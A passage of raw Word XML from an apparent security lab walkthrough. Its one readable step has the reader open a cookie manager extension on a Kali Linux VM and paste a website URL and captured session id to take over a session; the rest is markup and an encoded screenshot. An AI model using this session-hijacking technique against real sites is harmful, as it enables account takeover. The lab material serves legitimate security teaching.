          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC2F637" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C8E06" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30914131" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>11 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">open browser on kali Linux VM go to cookie manager extension </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7EB371" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter the website </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and session id and save the cookie </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB6CA32" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66EF47A8" wp14:editId="049CE74E">
                <wp:extent cx="5986577" cy="3724885"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41077" name="Group 41077"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3724885"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3724885"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3266" name="Rectangle 3266"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0CA28AB1"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267" name="Rectangle 3267"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3411093"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2DD0A26A"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268" name="Rectangle 3268"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3575685"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="127A9872"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280" name="Picture 3280"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId79"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="187405"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3281" name="Shape 3281"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="174705"/>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EF47A8" id="Group 41077" o:spid="_x0000_s1252" style="width:471.4pt;height:293.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,372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5ZXMJAQAAMANAAAOAAAAZHJzL2Uyb0RvYy54bWzkV21v2zYQ/j5g&#10;/0HQ90aSZVmyEKcYmjUoMKxBX34ATVGWMIokSPptv353pCi7cbpkKdAWWIDIlHg8Pvfc8e54/fow&#10;8GjHtOmlWMXZVRpHTFDZ9GKzij9/evuqiiNjiWgIl4Kt4iMz8eubX3+53quazWQnecN0BEqEqfdq&#10;FXfWqjpJDO3YQMyVVEzAZCv1QCy86k3SaLIH7QNPZmm6SPZSN0pLyoyBr7d+Mr5x+tuWUfu+bQ2z&#10;EV/FgM26p3bPNT6Tm2tSbzRRXU9HGOQFKAbSC9h0UnVLLIm2ur9QNfRUSyNbe0XlkMi27SlzNoA1&#10;WfrAmjstt8rZsqn3GzXRBNQ+4OnFaumfuzutPqp7DUzs1Qa4cG9oy6HVA/4CyujgKDtOlLGDjSh8&#10;LJbVoijLOKIwl5ezeVUVnlTaAfMX62j3+xMrk7Bx8gWcvYIAMScOzLdx8LEjijlqTQ0c3Ouob8CA&#10;2WIRR4IMEKkfIHaI2HAWua+OHic7kWVqA7w9m6liOc89T9mymucLpGkyltRKG3vH5BDhYBVr2N5F&#10;FNn9YawXDSK4JRf4FPJtz7mfxS/AWUCFI3tYH5xhWeq2w29r2RzB3E7qv9/DwW253K9iOY5iPMuw&#10;O87GEX8ngGY8NmGgw2AdBtryN9IdLo/nt62Vbe8An3YbgYH/MMi+jyMhJh9xZImsIwRw+tOOBJfN&#10;qxkQgME9z7J0mfvgnsK/KHLIcBj8P8KpkzX/F6cC1484tfpPTh3dWZTFIuSqn8Sdkx0/2p2qpzX8&#10;jwUHRhfJ9unCDKvsVrN4VDI8S8dA9F9b9QpqoyK2X/e8t0dX5yEVIiixu+8p5lx8Oc/bFXjVRwYI&#10;4L6QteEbHPYgieswUeL7F2rWvFeYRTF/4XgEDE3CgyL7iM2+gN9Kuh2YsL4j0YwDdilM1ysTR7pm&#10;w5pBcdHvmsxnD2M1s7TDDVvYGCuNT+HThEN5AoaYv1Jr8ipPoaxgAqrKeToW3ymgqzIvC+DGlWeQ&#10;XHqJl9Ydh8sjcUMA9t0yepUFF7vijQ52fD47m8+KRaCqnJeXVC2X2Ymq2TK/oIpufYlGx4WyDC1f&#10;4ws0fOvCiB5EGGIh/9fuEyId16FSHEZQjotqxNJB3ck9FJwfoE5/kk7SnlqrIOFj6CTDxbnspBNr&#10;2ajTrwhy4Vc53efy7iBBzASJ8OslfUJ9KEO5NMxvgGa5XmcyFXSdk8kFWj0r5imGKoF7QAtnyLU/&#10;0AKLJuC8aHCMPXKGfHDxgbXQ6kBLmrl1Rm/Wb7iOdgSbE/eHh88ZAaK4xp+9cVX61VUoSrjqyKhr&#10;VDNu4FSOmlCSuUvHBGZUS0c0/uYB/TvYGe4fAGla5GBJYaf1Am5NbkOM8tFaHPoKgQbhm2usXL8M&#10;1wSHaLzS4D3k/N3Jny5eN/8AAAD//wMAUEsDBAoAAAAAAAAAIQAl3LNxYIYBAGCGAQAUAAAAZHJz&#10;L21lZGlhL2ltYWdlMS5qcGf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQF&#10;CAUFBAQFCgcHBggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQE&#10;BQQFCQUFCRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFP/AABEIAh4D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&#10;ra5t/L/dy